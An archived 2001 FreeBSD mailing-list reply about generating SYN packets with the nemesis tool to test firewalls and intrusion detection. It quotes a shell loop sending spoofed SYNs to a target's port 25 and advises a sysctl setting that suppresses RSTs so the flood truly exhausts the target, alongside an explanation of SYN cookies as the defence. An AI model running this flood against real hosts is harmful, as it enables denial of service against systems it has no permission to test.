Skip site navigation (1)Skip section navigation (2) 
Date:      Fri, 9 Mar 2001 15:15:49 -0800
From:      "Jonathan Graehl" <jonathan@graehl.org>
To:        "Freebsd-Net" <freebsd-net@freebsd.org>
Cc:        "Walter Goralski" <walterg@juniper.net>
Subject:   RE: generating SYN packets with /usr/ports/net/nemesis and sh
Message-ID:  <NCBBLOALCKKINBNNEDDLKEDMDMAA.jonathan@graehl.org>
In-Reply-To: <NCBBLOALCKKINBNNEDDLCEDJDMAA.jonathan@graehl.org>
next in thread | previous in thread | raw e-mail | index | archive | help 
Replying to self (multiple personality disorder?):

Once caveat ... if you're trying to simulate the resource-exhaustion effects of
a true SYN flood (rather than simply testing the ability of your firewall /
intrusion detection system to react to a flood), then you will need to prevent
autogeneration of RSTs by your TCP stack in reply to the TCP SYN ACK replies
from the host you are attacking.  This could be accomplished either with
firewall rules (I haven't done this on FreeBSD, but I believe you use ipfw).

It is more easily accomplished with:
sysctl -w net.inet.tcp.blackhole=1

(udp.blackhole presumably surpresses generation of ICMP port unreachable when
there is nobody listening on a UDP port)

Traditionally .blackhole has been used to make port scanners' lives more
difficult (they will have to concurrently-initiate/manage/time-out pending
probes, or else proceed extremely slowly if using the default TCP connection
timeout), but tcp.blackhole can also facilitate an effective SYN flood attack.

For several years, most production servers will use tcp syncookies when faced
with a flood of syns ... the server, using no local state, sends a SYN ACK with
the server initial sequence number chosen to encode various state, and present
an unforgeable secret hash, so that SYN ACKs from the initiator can be verified
without having to remember anything about the embryonic connection.

> #!/bin/sh
> i=50000; while [ $i -lt 50100 ]; do nemesis-tcp -S 209.68.199.246 -D
> 209.68.199.242 -fS -x $i -y 25; i=$(($i + 1)); done
>
> ... seems to work fine; a perl script would give a more legible for
> loop though
> ;)
>
> --
> Jonathan Graehl
>   email: jonathan@graehl.org
>   web: http://jonathan.graehl.org/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-net" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?NCBBLOALCKKINBNNEDDLKEDMDMAA.jonathan>